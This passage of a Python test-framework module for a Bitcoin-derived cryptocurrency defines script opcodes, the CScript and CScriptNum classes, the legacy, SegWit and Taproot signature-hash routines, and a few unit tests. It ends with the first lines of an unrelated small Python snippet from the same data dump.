tweak_add_pubkey\n\nfrom .messages import (\n CTransaction,\n CTxOut,\n hash256,\n ser_string,\n ser_uint256,\n sha256,\n uint256_from_str,\n)\n\nMAX_SCRIPT_ELEMENT_SIZE = 520\nLOCKTIME_THRESHOLD = 500000000\nANNEX_TAG = 0x50\n\nOPCODE_NAMES = {} # type: Dict[CScriptOp, str]\n\nLEAF_VERSION_TAPSCRIPT = 0xc0\n\ndef hash160(s):\n return hashlib.new('ripemd160', sha256(s)).digest()\n\ndef bn2vch(v):\n \"\"\"Convert number to eleccoin-specific little endian format.\"\"\"\n # We need v.bit_length() bits, plus a sign bit for every nonzero number.\n n_bits = v.bit_length() + (v != 0)\n # The number of bytes for that is:\n n_bytes = (n_bits + 7) // 8\n # Convert number to absolute value + sign in top bit.\n encoded_v = 0 if v == 0 else abs(v) | ((v < 0) << (n_bytes * 8 - 1))\n # Serialize to bytes\n return encoded_v.to_bytes(n_bytes, 'little')\n\n_opcode_instances = [] # type: List[CScriptOp]\nclass CScriptOp(int):\n \"\"\"A single script opcode\"\"\"\n __slots__ = ()\n\n @staticmethod\n def encode_op_pushdata(d):\n \"\"\"Encode a PUSHDATA op, returning bytes\"\"\"\n if len(d) < 0x4c:\n return b'' + bytes([len(d)]) + d # OP_PUSHDATA\n elif len(d) <= 0xff:\n return b'\\x4c' + bytes([len(d)]) + d # OP_PUSHDATA1\n elif len(d) <= 0xffff:\n return b'\\x4d' + struct.pack(b'<H', len(d)) + d # OP_PUSHDATA2\n elif len(d) <= 0xffffffff:\n return b'\\x4e' + struct.pack(b'<I', len(d)) + d # OP_PUSHDATA4\n else:\n raise ValueError(\"Data too long to encode in a PUSHDATA op\")\n\n @staticmethod\n def encode_op_n(n):\n \"\"\"Encode a small integer op, returning an opcode\"\"\"\n if not (0 <= n <= 16):\n raise ValueError('Integer must be in range 0 <= n <= 16, got %d' % n)\n\n if n == 0:\n return OP_0\n else:\n return CScriptOp(OP_1 + n - 1)\n\n def decode_op_n(self):\n \"\"\"Decode a small integer opcode, returning an integer\"\"\"\n if self == OP_0:\n return 0\n\n if not (self == OP_0 or OP_1 <= self <= OP_16):\n raise ValueError('op %r is not an OP_N' % self)\n\n return int(self - OP_1 + 1)\n\n def is_small_int(self):\n \"\"\"Return true if the op pushes a small integer to the stack\"\"\"\n if 0x51 <= self <= 0x60 or self == 0:\n return True\n else:\n return False\n\n def __str__(self):\n return repr(self)\n\n 
def __repr__(self):\n if self in OPCODE_NAMES:\n return OPCODE_NAMES[self]\n else:\n return 'CScriptOp(0x%x)' % self\n\n def __new__(cls, n):\n try:\n return _opcode_instances[n]\n except IndexError:\n assert len(_opcode_instances) == n\n _opcode_instances.append(super().__new__(cls, n))\n return _opcode_instances[n]\n\n# Populate opcode instance table\nfor n in range(0xff + 1):\n CScriptOp(n)\n\n\n# push value\nOP_0 = CScriptOp(0x00)\nOP_FALSE = OP_0\nOP_PUSHDATA1 = CScriptOp(0x4c)\nOP_PUSHDATA2 = CScriptOp(0x4d)\nOP_PUSHDATA4 = CScriptOp(0x4e)\nOP_1NEGATE = CScriptOp(0x4f)\nOP_RESERVED = CScriptOp(0x50)\nOP_1 = CScriptOp(0x51)\nOP_TRUE = OP_1\nOP_2 = CScriptOp(0x52)\nOP_3 = CScriptOp(0x53)\nOP_4 = CScriptOp(0x54)\nOP_5 = CScriptOp(0x55)\nOP_6 = CScriptOp(0x56)\nOP_7 = CScriptOp(0x57)\nOP_8 = CScriptOp(0x58)\nOP_9 = CScriptOp(0x59)\nOP_10 = CScriptOp(0x5a)\nOP_11 = CScriptOp(0x5b)\nOP_12 = CScriptOp(0x5c)\nOP_13 = CScriptOp(0x5d)\nOP_14 = CScriptOp(0x5e)\nOP_15 = CScriptOp(0x5f)\nOP_16 = CScriptOp(0x60)\n\n# control\nOP_NOP = CScriptOp(0x61)\nOP_VER = CScriptOp(0x62)\nOP_IF = CScriptOp(0x63)\nOP_NOTIF = CScriptOp(0x64)\nOP_VERIF = CScriptOp(0x65)\nOP_VERNOTIF = CScriptOp(0x66)\nOP_ELSE = CScriptOp(0x67)\nOP_ENDIF = CScriptOp(0x68)\nOP_VERIFY = CScriptOp(0x69)\nOP_RETURN = CScriptOp(0x6a)\n\n# stack ops\nOP_TOALTSTACK = CScriptOp(0x6b)\nOP_FROMALTSTACK = CScriptOp(0x6c)\nOP_2DROP = CScriptOp(0x6d)\nOP_2DUP = CScriptOp(0x6e)\nOP_3DUP = CScriptOp(0x6f)\nOP_2OVER = CScriptOp(0x70)\nOP_2ROT = CScriptOp(0x71)\nOP_2SWAP = CScriptOp(0x72)\nOP_IFDUP = CScriptOp(0x73)\nOP_DEPTH = CScriptOp(0x74)\nOP_DROP = CScriptOp(0x75)\nOP_DUP = CScriptOp(0x76)\nOP_NIP = CScriptOp(0x77)\nOP_OVER = CScriptOp(0x78)\nOP_PICK = CScriptOp(0x79)\nOP_ROLL = CScriptOp(0x7a)\nOP_ROT = CScriptOp(0x7b)\nOP_SWAP = CScriptOp(0x7c)\nOP_TUCK = CScriptOp(0x7d)\n\n# splice ops\nOP_CAT = CScriptOp(0x7e)\nOP_SUBSTR = CScriptOp(0x7f)\nOP_LEFT = CScriptOp(0x80)\nOP_RIGHT = CScriptOp(0x81)\nOP_SIZE = CScriptOp(0x82)\n\n# bit logic\nOP_INVERT = CScriptOp(0x83)\nOP_AND = CScriptOp(0x84)\nOP_OR = CScriptOp(0x85)\nOP_XOR = CScriptOp(0x86)\nOP_EQUAL = CScriptOp(0x87)\nOP_EQUALVERIFY = CScriptOp(0x88)\nOP_RESERVED1 = CScriptOp(0x89)\nOP_RESERVED2 = CScriptOp(0x8a)\n\n# numeric\nOP_1ADD = CScriptOp(0x8b)\nOP_1SUB = CScriptOp(0x8c)\nOP_2MUL = CScriptOp(0x8d)\nOP_2DIV = CScriptOp(0x8e)\nOP_NEGATE = CScriptOp(0x8f)\nOP_ABS = CScriptOp(0x90)\nOP_NOT = CScriptOp(0x91)\nOP_0NOTEQUAL = CScriptOp(0x92)\n\nOP_ADD = CScriptOp(0x93)\nOP_SUB = CScriptOp(0x94)\nOP_MUL = CScriptOp(0x95)\nOP_DIV = CScriptOp(0x96)\nOP_MOD = CScriptOp(0x97)\nOP_LSHIFT = CScriptOp(0x98)\nOP_RSHIFT = CScriptOp(0x99)\n\nOP_BOOLAND = CScriptOp(0x9a)\nOP_BOOLOR = CScriptOp(0x9b)\nOP_NUMEQUAL = CScriptOp(0x9c)\nOP_NUMEQUALVERIFY = CScriptOp(0x9d)\nOP_NUMNOTEQUAL = CScriptOp(0x9e)\nOP_LESSTHAN = CScriptOp(0x9f)\nOP_GREATERTHAN = CScriptOp(0xa0)\nOP_LESSTHANOREQUAL = CScriptOp(0xa1)\nOP_GREATERTHANOREQUAL = CScriptOp(0xa2)\nOP_MIN = CScriptOp(0xa3)\nOP_MAX = CScriptOp(0xa4)\n\nOP_WITHIN = CScriptOp(0xa5)\n\n# crypto\nOP_RIPEMD160 = CScriptOp(0xa6)\nOP_SHA1 = CScriptOp(0xa7)\nOP_SHA256 = CScriptOp(0xa8)\nOP_HASH160 = CScriptOp(0xa9)\nOP_HASH256 = CScriptOp(0xaa)\nOP_CODESEPARATOR = CScriptOp(0xab)\nOP_CHECKSIG = CScriptOp(0xac)\nOP_CHECKSIGVERIFY = CScriptOp(0xad)\nOP_CHECKMULTISIG = CScriptOp(0xae)\nOP_CHECKMULTISIGVERIFY = CScriptOp(0xaf)\n\n# expansion\nOP_NOP1 = CScriptOp(0xb0)\nOP_CHECKLOCKTIMEVERIFY = CScriptOp(0xb1)\nOP_CHECKSEQUENCEVERIFY = CScriptOp(0xb2)\nOP_NOP4 = 
CScriptOp(0xb3)\nOP_NOP5 = CScriptOp(0xb4)\nOP_NOP6 = CScriptOp(0xb5)\nOP_NOP7 = CScriptOp(0xb6)\nOP_NOP8 = CScriptOp(0xb7)\nOP_NOP9 = CScriptOp(0xb8)\nOP_NOP10 = CScriptOp(0xb9)\n\n# BIP 342 opcodes (Tapscript)\nOP_CHECKSIGADD = CScriptOp(0xba)\n\nOP_INVALIDOPCODE = CScriptOp(0xff)\n\nOPCODE_NAMES.update({\n OP_0: 'OP_0',\n OP_PUSHDATA1: 'OP_PUSHDATA1',\n OP_PUSHDATA2: 'OP_PUSHDATA2',\n OP_PUSHDATA4: 'OP_PUSHDATA4',\n OP_1NEGATE: 'OP_1NEGATE',\n OP_RESERVED: 'OP_RESERVED',\n OP_1: 'OP_1',\n OP_2: 'OP_2',\n OP_3: 'OP_3',\n OP_4: 'OP_4',\n OP_5: 'OP_5',\n OP_6: 'OP_6',\n OP_7: 'OP_7',\n OP_8: 'OP_8',\n OP_9: 'OP_9',\n OP_10: 'OP_10',\n OP_11: 'OP_11',\n OP_12: 'OP_12',\n OP_13: 'OP_13',\n OP_14: 'OP_14',\n OP_15: 'OP_15',\n OP_16: 'OP_16',\n OP_NOP: 'OP_NOP',\n OP_VER: 'OP_VER',\n OP_IF: 'OP_IF',\n OP_NOTIF: 'OP_NOTIF',\n OP_VERIF: 'OP_VERIF',\n OP_VERNOTIF: 'OP_VERNOTIF',\n OP_ELSE: 'OP_ELSE',\n OP_ENDIF: 'OP_ENDIF',\n OP_VERIFY: 'OP_VERIFY',\n OP_RETURN: 'OP_RETURN',\n OP_TOALTSTACK: 'OP_TOALTSTACK',\n OP_FROMALTSTACK: 'OP_FROMALTSTACK',\n OP_2DROP: 'OP_2DROP',\n OP_2DUP: 'OP_2DUP',\n OP_3DUP: 'OP_3DUP',\n OP_2OVER: 'OP_2OVER',\n OP_2ROT: 'OP_2ROT',\n OP_2SWAP: 'OP_2SWAP',\n OP_IFDUP: 'OP_IFDUP',\n OP_DEPTH: 'OP_DEPTH',\n OP_DROP: 'OP_DROP',\n OP_DUP: 'OP_DUP',\n OP_NIP: 'OP_NIP',\n OP_OVER: 'OP_OVER',\n OP_PICK: 'OP_PICK',\n OP_ROLL: 'OP_ROLL',\n OP_ROT: 'OP_ROT',\n OP_SWAP: 'OP_SWAP',\n OP_TUCK: 'OP_TUCK',\n OP_CAT: 'OP_CAT',\n OP_SUBSTR: 'OP_SUBSTR',\n OP_LEFT: 'OP_LEFT',\n OP_RIGHT: 'OP_RIGHT',\n OP_SIZE: 'OP_SIZE',\n OP_INVERT: 'OP_INVERT',\n OP_AND: 'OP_AND',\n OP_OR: 'OP_OR',\n OP_XOR: 'OP_XOR',\n OP_EQUAL: 'OP_EQUAL',\n OP_EQUALVERIFY: 'OP_EQUALVERIFY',\n OP_RESERVED1: 'OP_RESERVED1',\n OP_RESERVED2: 'OP_RESERVED2',\n OP_1ADD: 'OP_1ADD',\n OP_1SUB: 'OP_1SUB',\n OP_2MUL: 'OP_2MUL',\n OP_2DIV: 'OP_2DIV',\n OP_NEGATE: 'OP_NEGATE',\n OP_ABS: 'OP_ABS',\n OP_NOT: 'OP_NOT',\n OP_0NOTEQUAL: 'OP_0NOTEQUAL',\n OP_ADD: 'OP_ADD',\n OP_SUB: 'OP_SUB',\n OP_MUL: 'OP_MUL',\n OP_DIV: 'OP_DIV',\n OP_MOD: 'OP_MOD',\n OP_LSHIFT: 'OP_LSHIFT',\n OP_RSHIFT: 'OP_RSHIFT',\n OP_BOOLAND: 'OP_BOOLAND',\n OP_BOOLOR: 'OP_BOOLOR',\n OP_NUMEQUAL: 'OP_NUMEQUAL',\n OP_NUMEQUALVERIFY: 'OP_NUMEQUALVERIFY',\n OP_NUMNOTEQUAL: 'OP_NUMNOTEQUAL',\n OP_LESSTHAN: 'OP_LESSTHAN',\n OP_GREATERTHAN: 'OP_GREATERTHAN',\n OP_LESSTHANOREQUAL: 'OP_LESSTHANOREQUAL',\n OP_GREATERTHANOREQUAL: 'OP_GREATERTHANOREQUAL',\n OP_MIN: 'OP_MIN',\n OP_MAX: 'OP_MAX',\n OP_WITHIN: 'OP_WITHIN',\n OP_RIPEMD160: 'OP_RIPEMD160',\n OP_SHA1: 'OP_SHA1',\n OP_SHA256: 'OP_SHA256',\n OP_HASH160: 'OP_HASH160',\n OP_HASH256: 'OP_HASH256',\n OP_CODESEPARATOR: 'OP_CODESEPARATOR',\n OP_CHECKSIG: 'OP_CHECKSIG',\n OP_CHECKSIGVERIFY: 'OP_CHECKSIGVERIFY',\n OP_CHECKMULTISIG: 'OP_CHECKMULTISIG',\n OP_CHECKMULTISIGVERIFY: 'OP_CHECKMULTISIGVERIFY',\n OP_NOP1: 'OP_NOP1',\n OP_CHECKLOCKTIMEVERIFY: 'OP_CHECKLOCKTIMEVERIFY',\n OP_CHECKSEQUENCEVERIFY: 'OP_CHECKSEQUENCEVERIFY',\n OP_NOP4: 'OP_NOP4',\n OP_NOP5: 'OP_NOP5',\n OP_NOP6: 'OP_NOP6',\n OP_NOP7: 'OP_NOP7',\n OP_NOP8: 'OP_NOP8',\n OP_NOP9: 'OP_NOP9',\n OP_NOP10: 'OP_NOP10',\n OP_CHECKSIGADD: 'OP_CHECKSIGADD',\n OP_INVALIDOPCODE: 'OP_INVALIDOPCODE',\n})\n\nclass CScriptInvalidError(Exception):\n \"\"\"Base class for CScript exceptions\"\"\"\n pass\n\nclass CScriptTruncatedPushDataError(CScriptInvalidError):\n \"\"\"Invalid pushdata due to truncation\"\"\"\n def __init__(self, msg, data):\n self.data = data\n super().__init__(msg)\n\n\n# This is used, eg, for blockchain heights in coinbase scripts (bip34)\nclass 
CScriptNum:\n __slots__ = (\"value\",)\n\n def __init__(self, d=0):\n self.value = d\n\n @staticmethod\n def encode(obj):\n r = bytearray(0)\n if obj.value == 0:\n return bytes(r)\n neg = obj.value < 0\n absvalue = -obj.value if neg else obj.value\n while (absvalue):\n r.append(absvalue & 0xff)\n absvalue >>= 8\n if r[-1] & 0x80:\n r.append(0x80 if neg else 0)\n elif neg:\n r[-1] |= 0x80\n return bytes([len(r)]) + r\n\n @staticmethod\n def decode(vch):\n result = 0\n # We assume valid push_size and minimal encoding\n value = vch[1:]\n if len(value) == 0:\n return result\n for i, byte in enumerate(value):\n result |= int(byte) << 8 * i\n if value[-1] >= 0x80:\n # Mask for all but the highest result bit\n num_mask = (2**(len(value) * 8) - 1) >> 1\n result &= num_mask\n result *= -1\n return result\n\n\nclass CScript(bytes):\n \"\"\"Serialized script\n\n A bytes subclass, so you can use this directly whenever bytes are accepted.\n Note that this means that indexing does *not* work - you'll get an index by\n byte rather than opcode. This format was chosen for efficiency so that the\n general case would not require creating a lot of little CScriptOP objects.\n\n iter(script) however does iterate by opcode.\n \"\"\"\n __slots__ = ()\n\n @classmethod\n def __coerce_instance(cls, other):\n # Coerce other into bytes\n if isinstance(other, CScriptOp):\n other = bytes([other])\n elif isinstance(other, CScriptNum):\n if (other.value == 0):\n other = bytes([CScriptOp(OP_0)])\n else:\n other = CScriptNum.encode(other)\n elif isinstance(other, int):\n if 0 <= other <= 16:\n other = bytes([CScriptOp.encode_op_n(other)])\n elif other == -1:\n other = bytes([OP_1NEGATE])\n else:\n other = CScriptOp.encode_op_pushdata(bn2vch(other))\n elif isinstance(other, (bytes, bytearray)):\n other = CScriptOp.encode_op_pushdata(other)\n return other\n\n def __add__(self, other):\n # add makes no sense for a CScript()\n raise NotImplementedError\n\n def join(self, iterable):\n # join makes no sense for a CScript()\n raise NotImplementedError\n\n def __new__(cls, value=b''):\n if isinstance(value, bytes) or isinstance(value, bytearray):\n return super().__new__(cls, value)\n else:\n def coerce_iterable(iterable):\n for instance in iterable:\n yield cls.__coerce_instance(instance)\n # Annoyingly on both python2 and python3 bytes.join() always\n # returns a bytes instance even when subclassed.\n return super().__new__(cls, b''.join(coerce_iterable(value)))\n\n def raw_iter(self):\n \"\"\"Raw iteration\n\n Yields tuples of (opcode, data, sop_idx) so that the different possible\n PUSHDATA encodings can be accurately distinguished, as well as\n determining the exact opcode byte indexes. 
(sop_idx)\n \"\"\"\n i = 0\n while i < len(self):\n sop_idx = i\n opcode = self[i]\n i += 1\n\n if opcode > OP_PUSHDATA4:\n yield (opcode, None, sop_idx)\n else:\n datasize = None\n pushdata_type = None\n if opcode < OP_PUSHDATA1:\n pushdata_type = 'PUSHDATA(%d)' % opcode\n datasize = opcode\n\n elif opcode == OP_PUSHDATA1:\n pushdata_type = 'PUSHDATA1'\n if i >= len(self):\n raise CScriptInvalidError('PUSHDATA1: missing data length')\n datasize = self[i]\n i += 1\n\n elif opcode == OP_PUSHDATA2:\n pushdata_type = 'PUSHDATA2'\n if i + 1 >= len(self):\n raise CScriptInvalidError('PUSHDATA2: missing data length')\n datasize = self[i] + (self[i + 1] << 8)\n i += 2\n\n elif opcode == OP_PUSHDATA4:\n pushdata_type = 'PUSHDATA4'\n if i + 3 >= len(self):\n raise CScriptInvalidError('PUSHDATA4: missing data length')\n datasize = self[i] + (self[i + 1] << 8) + (self[i + 2] << 16) + (self[i + 3] << 24)\n i += 4\n\n else:\n assert False # shouldn't happen\n\n data = bytes(self[i:i + datasize])\n\n # Check for truncation\n if len(data) < datasize:\n raise CScriptTruncatedPushDataError('%s: truncated data' % pushdata_type, data)\n\n i += datasize\n\n yield (opcode, data, sop_idx)\n\n def __iter__(self):\n \"\"\"'Cooked' iteration\n\n Returns either a CScriptOP instance, an integer, or bytes, as\n appropriate.\n\n See raw_iter() if you need to distinguish the different possible\n PUSHDATA encodings.\n \"\"\"\n for (opcode, data, sop_idx) in self.raw_iter():\n if data is not None:\n yield data\n else:\n opcode = CScriptOp(opcode)\n\n if opcode.is_small_int():\n yield opcode.decode_op_n()\n else:\n yield CScriptOp(opcode)\n\n def __repr__(self):\n def _repr(o):\n if isinstance(o, bytes):\n return \"x('%s')\" % o.hex()\n else:\n return repr(o)\n\n ops = []\n i = iter(self)\n while True:\n op = None\n try:\n op = _repr(next(i))\n except CScriptTruncatedPushDataError as err:\n op = '%s...<ERROR: %s>' % (_repr(err.data), err)\n break\n except CScriptInvalidError as err:\n op = '<ERROR: %s>' % err\n break\n except StopIteration:\n break\n finally:\n if op is not None:\n ops.append(op)\n\n return \"CScript([%s])\" % ', '.join(ops)\n\n def GetSigOpCount(self, fAccurate):\n \"\"\"Get the SigOp count.\n\n fAccurate - Accurately count CHECKMULTISIG, see BIP16 for details.\n\n Note that this is consensus-critical.\n \"\"\"\n n = 0\n lastOpcode = OP_INVALIDOPCODE\n for (opcode, data, sop_idx) in self.raw_iter():\n if opcode in (OP_CHECKSIG, OP_CHECKSIGVERIFY):\n n += 1\n elif opcode in (OP_CHECKMULTISIG, OP_CHECKMULTISIGVERIFY):\n if fAccurate and (OP_1 <= lastOpcode <= OP_16):\n n += opcode.decode_op_n()\n else:\n n += 20\n lastOpcode = opcode\n return n\n\n\nSIGHASH_DEFAULT = 0 # Taproot-only default, semantics same as SIGHASH_ALL\nSIGHASH_ALL = 1\nSIGHASH_NONE = 2\nSIGHASH_SINGLE = 3\nSIGHASH_ANYONECANPAY = 0x80\n\ndef FindAndDelete(script, sig):\n \"\"\"Consensus critical, see FindAndDelete() in Electron codebase\"\"\"\n r = b''\n last_sop_idx = sop_idx = 0\n skip = True\n for (opcode, data, sop_idx) in script.raw_iter():\n if not skip:\n r += script[last_sop_idx:sop_idx]\n last_sop_idx = sop_idx\n if script[sop_idx:sop_idx + len(sig)] == sig:\n skip = True\n else:\n skip = False\n if not skip:\n r += script[last_sop_idx:]\n return CScript(r)\n\ndef LegacySignatureHash(script, txTo, inIdx, hashtype):\n \"\"\"Consensus-correct SignatureHash\n\n Returns (hash, err) to precisely match the consensus-critical behavior of\n the SIGHASH_SINGLE bug. 
(inIdx is *not* checked for validity)\n \"\"\"\n HASH_ONE = b'\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n\n if inIdx >= len(txTo.vin):\n return (HASH_ONE, \"inIdx %d out of range (%d)\" % (inIdx, len(txTo.vin)))\n txtmp = CTransaction(txTo)\n\n for txin in txtmp.vin:\n txin.scriptSig = b''\n txtmp.vin[inIdx].scriptSig = FindAndDelete(script, CScript([OP_CODESEPARATOR]))\n\n if (hashtype & 0x1f) == SIGHASH_NONE:\n txtmp.vout = []\n\n for i in range(len(txtmp.vin)):\n if i != inIdx:\n txtmp.vin[i].nSequence = 0\n\n elif (hashtype & 0x1f) == SIGHASH_SINGLE:\n outIdx = inIdx\n if outIdx >= len(txtmp.vout):\n return (HASH_ONE, \"outIdx %d out of range (%d)\" % (outIdx, len(txtmp.vout)))\n\n tmp = txtmp.vout[outIdx]\n txtmp.vout = []\n for _ in range(outIdx):\n txtmp.vout.append(CTxOut(-1))\n txtmp.vout.append(tmp)\n\n for i in range(len(txtmp.vin)):\n if i != inIdx:\n txtmp.vin[i].nSequence = 0\n\n if hashtype & SIGHASH_ANYONECANPAY:\n tmp = txtmp.vin[inIdx]\n txtmp.vin = []\n txtmp.vin.append(tmp)\n\n s = txtmp.serialize_without_witness()\n s += struct.pack(b\"<I\", hashtype)\n\n hash = hash256(s)\n\n return (hash, None)\n\n# TODO: Allow cached hashPrevouts/hashSequence/hashOutputs to be provided.\n# Performance optimization probably not necessary for python tests, however.\n# Note that this corresponds to sigversion == 1 in EvalScript, which is used\n# for version 0 witnesses.\ndef SegwitV0SignatureHash(script, txTo, inIdx, hashtype, amount):\n\n hashPrevouts = 0\n hashSequence = 0\n hashOutputs = 0\n\n if not (hashtype & SIGHASH_ANYONECANPAY):\n serialize_prevouts = bytes()\n for i in txTo.vin:\n serialize_prevouts += i.prevout.serialize()\n hashPrevouts = uint256_from_str(hash256(serialize_prevouts))\n\n if (not (hashtype & SIGHASH_ANYONECANPAY) and (hashtype & 0x1f) != SIGHASH_SINGLE and (hashtype & 0x1f) != SIGHASH_NONE):\n serialize_sequence = bytes()\n for i in txTo.vin:\n serialize_sequence += struct.pack(\"<I\", i.nSequence)\n hashSequence = uint256_from_str(hash256(serialize_sequence))\n\n if ((hashtype & 0x1f) != SIGHASH_SINGLE and (hashtype & 0x1f) != SIGHASH_NONE):\n serialize_outputs = bytes()\n for o in txTo.vout:\n serialize_outputs += o.serialize()\n hashOutputs = uint256_from_str(hash256(serialize_outputs))\n elif ((hashtype & 0x1f) == SIGHASH_SINGLE and inIdx < len(txTo.vout)):\n serialize_outputs = txTo.vout[inIdx].serialize()\n hashOutputs = uint256_from_str(hash256(serialize_outputs))\n\n ss = bytes()\n ss += struct.pack(\"<i\", txTo.nVersion)\n ss += ser_uint256(hashPrevouts)\n ss += ser_uint256(hashSequence)\n ss += txTo.vin[inIdx].prevout.serialize()\n ss += ser_string(script)\n ss += struct.pack(\"<q\", amount)\n ss += struct.pack(\"<I\", txTo.vin[inIdx].nSequence)\n ss += ser_uint256(hashOutputs)\n ss += struct.pack(\"<i\", txTo.nLockTime)\n ss += struct.pack(\"<I\", hashtype)\n\n return hash256(ss)\n\nclass TestFrameworkScript(unittest.TestCase):\n def test_bn2vch(self):\n self.assertEqual(bn2vch(0), bytes([]))\n self.assertEqual(bn2vch(1), bytes([0x01]))\n self.assertEqual(bn2vch(-1), bytes([0x81]))\n self.assertEqual(bn2vch(0x7F), bytes([0x7F]))\n self.assertEqual(bn2vch(-0x7F), bytes([0xFF]))\n self.assertEqual(bn2vch(0x80), bytes([0x80, 0x00]))\n self.assertEqual(bn2vch(-0x80), bytes([0x80, 0x80]))\n self.assertEqual(bn2vch(0xFF), bytes([0xFF, 0x00]))\n self.assertEqual(bn2vch(-0xFF), bytes([0xFF, 0x80]))\n self.assertEqual(bn2vch(0x100), 
bytes([0x00, 0x01]))\n self.assertEqual(bn2vch(-0x100), bytes([0x00, 0x81]))\n self.assertEqual(bn2vch(0x7FFF), bytes([0xFF, 0x7F]))\n self.assertEqual(bn2vch(-0x8000), bytes([0x00, 0x80, 0x80]))\n self.assertEqual(bn2vch(-0x7FFFFF), bytes([0xFF, 0xFF, 0xFF]))\n self.assertEqual(bn2vch(0x80000000), bytes([0x00, 0x00, 0x00, 0x80, 0x00]))\n self.assertEqual(bn2vch(-0x80000000), bytes([0x00, 0x00, 0x00, 0x80, 0x80]))\n self.assertEqual(bn2vch(0xFFFFFFFF), bytes([0xFF, 0xFF, 0xFF, 0xFF, 0x00]))\n self.assertEqual(bn2vch(123456789), bytes([0x15, 0xCD, 0x5B, 0x07]))\n self.assertEqual(bn2vch(-54321), bytes([0x31, 0xD4, 0x80]))\n\n def test_cscriptnum_encoding(self):\n # round-trip negative and multi-byte CScriptNums\n values = [0, 1, -1, -2, 127, 128, -255, 256, (1 << 15) - 1, -(1 << 16), (1 << 24) - 1, (1 << 31), 1 - (1 << 32), 1 << 40, 1500, -1500]\n for value in values:\n self.assertEqual(CScriptNum.decode(CScriptNum.encode(CScriptNum(value))), value)\n\ndef TaprootSignatureHash(txTo, spent_utxos, hash_type, input_index = 0, scriptpath = False, script = CScript(), codeseparator_pos = -1, annex = None, leaf_ver = LEAF_VERSION_TAPSCRIPT):\n assert (len(txTo.vin) == len(spent_utxos))\n assert (input_index < len(txTo.vin))\n out_type = SIGHASH_ALL if hash_type == 0 else hash_type & 3\n in_type = hash_type & SIGHASH_ANYONECANPAY\n spk = spent_utxos[input_index].scriptPubKey\n ss = bytes([0, hash_type]) # epoch, hash_type\n ss += struct.pack(\"<i\", txTo.nVersion)\n ss += struct.pack(\"<I\", txTo.nLockTime)\n if in_type != SIGHASH_ANYONECANPAY:\n ss += sha256(b\"\".join(i.prevout.serialize() for i in txTo.vin))\n ss += sha256(b\"\".join(struct.pack(\"<q\", u.nValue) for u in spent_utxos))\n ss += sha256(b\"\".join(ser_string(u.scriptPubKey) for u in spent_utxos))\n ss += sha256(b\"\".join(struct.pack(\"<I\", i.nSequence) for i in txTo.vin))\n if out_type == SIGHASH_ALL:\n ss += sha256(b\"\".join(o.serialize() for o in txTo.vout))\n spend_type = 0\n if annex is not None:\n spend_type |= 1\n if (scriptpath):\n spend_type |= 2\n ss += bytes([spend_type])\n if in_type == SIGHASH_ANYONECANPAY:\n ss += txTo.vin[input_index].prevout.serialize()\n ss += struct.pack(\"<q\", spent_utxos[input_index].nValue)\n ss += ser_string(spk)\n ss += struct.pack(\"<I\", txTo.vin[input_index].nSequence)\n else:\n ss += struct.pack(\"<I\", input_index)\n if (spend_type & 1):\n ss += sha256(ser_string(annex))\n if out_type == SIGHASH_SINGLE:\n if input_index < len(txTo.vout):\n ss += sha256(txTo.vout[input_index].serialize())\n else:\n ss += bytes(0 for _ in range(32))\n if (scriptpath):\n ss += TaggedHash(\"TapLeaf\", bytes([leaf_ver]) + ser_string(script))\n ss += bytes([0])\n ss += struct.pack(\"<i\", codeseparator_pos)\n assert len(ss) == 175 - (in_type == SIGHASH_ANYONECANPAY) * 49 - (out_type != SIGHASH_ALL and out_type != SIGHASH_SINGLE) * 32 + (annex is not None) * 32 + scriptpath * 37\n return TaggedHash(\"TapSighash\", ss)\n\ndef taproot_tree_helper(scripts):\n if len(scripts) == 0:\n return ([], bytes(0 for _ in range(32)))\n if len(scripts) == 1:\n # One entry: treat as a leaf\n script = scripts[0]\n assert(not callable(script))\n if isinstance(script, list):\n return taproot_tree_helper(script)\n assert(isinstance(script, tuple))\n version = LEAF_VERSION_TAPSCRIPT\n name = script[0]\n code = script[1]\n if len(script) == 3:\n version = script[2]\n assert version & 1 == 0\n assert isinstance(code, bytes)\n h = TaggedHash(\"TapLeaf\", bytes([version]) + ser_string(code))\n if name is None:\n return ([], h)\n 
return ([(name, version, code, bytes())], h)\n elif len(scripts) == 2 and callable(scripts[1]):\n # Two entries, and the right one is a function\n left, left_h = taproot_tree_helper(scripts[0:1])\n right_h = scripts[1](left_h)\n left = [(name, version, script, control + right_h) for name, version, script, control in left]\n right = []\n else:\n # Two or more entries: descend into each side\n split_pos = len(scripts) // 2\n left, left_h = taproot_tree_helper(scripts[0:split_pos])\n right, right_h = taproot_tree_helper(scripts[split_pos:])\n left = [(name, version, script, control + right_h) for name, version, script, control in left]\n right = [(name, version, script, control + left_h) for name, version, script, control in right]\n if right_h < left_h:\n right_h, left_h = left_h, right_h\n h = TaggedHash(\"TapBranch\", left_h + right_h)\n return (left + right, h)\n\nTaprootInfo = namedtuple(\"TaprootInfo\", \"scriptPubKey,inner_pubkey,negflag,tweak,leaves\")\nTaprootLeafInfo = namedtuple(\"TaprootLeafInfo\", \"script,version,merklebranch\")\n\ndef taproot_construct(pubkey, scripts=None):\n \"\"\"Construct a tree of Taproot spending conditions\n\n pubkey: an ECPubKey object for the internal pubkey\n scripts: a list of items; each item is either:\n - a (name, CScript) tuple\n - a (name, CScript, leaf version) tuple\n - another list of items (with the same structure)\n - a function, which specifies how to compute the hashing partner\n in function of the hash of whatever it is combined with\n\n Returns: script (sPK or redeemScript), tweak, {name:(script, leaf version, negation flag, innerkey, merklepath), ...}\n \"\"\"\n if scripts is None:\n scripts = []\n\n ret, h = taproot_tree_helper(scripts)\n tweak = TaggedHash(\"TapTweak\", pubkey + h)\n tweaked, negated = tweak_add_pubkey(pubkey, tweak)\n leaves = dict((name, TaprootLeafInfo(script, version, merklebranch)) for name, version, script, merklebranch in ret)\n return TaprootInfo(CScript([OP_1, tweaked]), pubkey, negated + 0, tweak, leaves)\n\ndef is_op_success(o):\n return o == 0x50 or o == 0x62 or o == 0x89 or o == 0x8a or o == 0x8d or o == 0x8e or (o >= 0x7e and o <= 0x81) or (o >= 0x83 and o <= 0x86) or (o >= 0x95 and o <= 0x99) or (o >= 0xbb and o <= 0xfe)\n"} {"ext": "py", "sha": "1a30fffb107d8e9918a26f257e964aec9b855a08", "content": "# num = int(input())\n#\n# if num > 5:\n# print(\">5\")\n#\n# elif num < 5:\n# 